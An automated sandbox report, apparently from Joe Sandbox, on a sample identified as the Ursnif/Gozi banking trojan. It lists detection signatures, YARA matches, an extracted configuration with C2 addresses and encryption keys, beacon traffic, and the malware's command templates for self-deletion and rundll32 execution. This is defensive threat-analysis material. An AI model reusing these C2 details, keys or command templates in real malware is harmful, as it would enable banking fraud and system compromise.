Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 825996
MD5: bfe5c79a11ef437d401fe8a27ea49372
SHA1: bd04d26776c766934f0acd2885cf97168dc5bbfb
SHA256: 881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
Tags: agenziaentrate, exe, gozi, isfb, ITA, mef, mise, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 6020 cmdline: C:\Users\user\Desktop\server.exe MD5: BFE5C79A11EF437D401FE8A27EA49372)
  • cleanup
Name: Gozi, Ursnif
Description:
  2000 Ursnif aka Snifula
  2006 Gozi v1.0, Gozi CRM, CRM, Papras
  2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*)
  -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest
  In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_RedLineStealer_ed346e4c | Description: unknown | Author: unknown
  • 0x58a1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Smokeloader_3687686f | Description: unknown | Author: unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown
  • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: server.exe | ReversingLabs: Detection: 38%
    Source: server.exe | Virustotal: Detection: 50%
    Source: server.exe | Joe Sandbox ML: detected
    Source: 0.2.server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
    Source: 00000000.00000003.244409614.0000000000790000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

    Compliance

    Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: global traffic | HTTP traffic detected:
        GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 62.173.142.51
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://62.173
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/
    Source: server.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/b
    Source: server.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2B
    Source: unknown | DNS traffic detected: queries for: checklist.skype.com

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match | File source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: server.exe, 00000000.00000002.509818085.000000000083A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

    E-Banking Fraud

    Source: Yara match | File source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

    System Summary

    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
